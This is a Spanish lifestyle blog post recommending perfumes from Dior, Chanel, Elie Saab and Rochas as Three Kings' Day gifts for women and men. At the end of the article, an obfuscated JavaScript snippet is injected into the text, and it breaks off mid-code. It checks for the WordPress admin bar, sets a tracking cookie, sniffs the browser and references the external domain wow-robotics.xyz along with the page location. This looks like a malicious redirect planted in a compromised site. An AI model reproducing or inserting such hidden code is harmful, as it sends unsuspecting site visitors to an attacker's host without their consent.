Siempre he pensado que una fragancia es un regalo fantástico. Lejos de lo que otros piensen, creo que cuando alguien regala un perfume está regalando mucho más que belleza. El hecho de elegir un perfume entre la gran variedad que hay hoy en día en el mercado significa que esa persona ha pensado en nosotros, ha buscado y ha elegido con mucho tacto y mimo. Además, siempre tengo la sensación de que cuando me regalan un perfume o una colonia, algo de ella hay en su elección. ¿Qué opináis?  Los aromas son algo muy especial y deberíamos apreciar mucho más a quienes nos regalan una fragancia.

regalos-reyes-magos-2019

¿Qué elegir: frescura o sensualidad?

 Hay fragancias para diferentes personas y también para momentos distintos del día. Si la persona a la que tienes que regalar una colonia es amante de los aromas frescos, quizá una buena elección sería el Eau de Toilette de Miss Dior Blooming Bouquet de Dior, una mezcla chispeante producida por la combinación de flores, destacando la peonía y la rosa. Una fragancia para personas muy alegres y cautivadoras, a las que les gusta rociarse de frescura cada mañana.

¿Conoces el nuevo Eau de Parfum Vaporizador de Gabrielle Chanel? Uhmm, un perfume ultra femenino con la composición de 4 flores blancas que le confieren una fragancia muy especial y delicada, con el jazmín como nota predominante. Un perfecto regalo si su destinataria es una mujer a la que le encantan los aromas florales y también la belleza de un frasco de cristal extremadamente delicado. Perfecto para regalar en Reyes.

tips-para-que-el-perfume-dure

Siempre me han llamado la atención las mujeres que entran pisando fuerte en cualquier ambiente y dejan un aroma especial, duradero pero no recargado. Seguro que conocéis algún caso similar. Y siempre me pregunto qué colonia usarán. Puede que Le Parfum In White de Elie Saab, una sutil fragancia con toques florales y afrutados. Intensa, con diferentes notas destacando la naranja y otras frutas rojas, y unas pequeñas notas a jazmín. Una perfecta elección para el día a día de cualquier mujer.

Regalar fragancias también a los hombres

Porque a ellos también les encanta que les regalemos perfumes y que soñemos con un aroma sensual y especial cuando nos referimos a ellos. El Eau de Parfum Sauvage de Dior tiene precisamente ese frescor jugoso y especiado que convertirá a tu compañero en un hombre misterioso y renovado. La fragancia incorpora notas especiadas junto a la Bergamota de Calabria, creando un olor muy jugoso y lleno de sensualidad, sin perder la masculinidad. Un regalo que le encantará.

perfumes-reyes-magos-hombre

¿No crees que hay hombres con una sensualidad innata y a los que les pega un perfume similar, que potencie ese lado natural y luminoso? Si es así, te recomendamos el Eau de Toilette Allure Homme Sport de Chanel, compuesto por una fragancia amaderada muy agradable, y con un toque chispeante muy interesante. Su frasco de cristal lacado plateado lo convierten, además, en un perfecto regalo para Reyes, original y absolutamente masculino. Pero como hay un aroma para cada hombre, también hay una fragancia especial y muy amaderada: Rochas Moustache es un clásico a base de mandarina y bayas rojas. Una fragancia para hombres únicos y atrevidos, o para ocasiones especiales. ¿Sabes a quién regalársela?

¿Recuerdas la colonia más especial que te hayan regalado? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone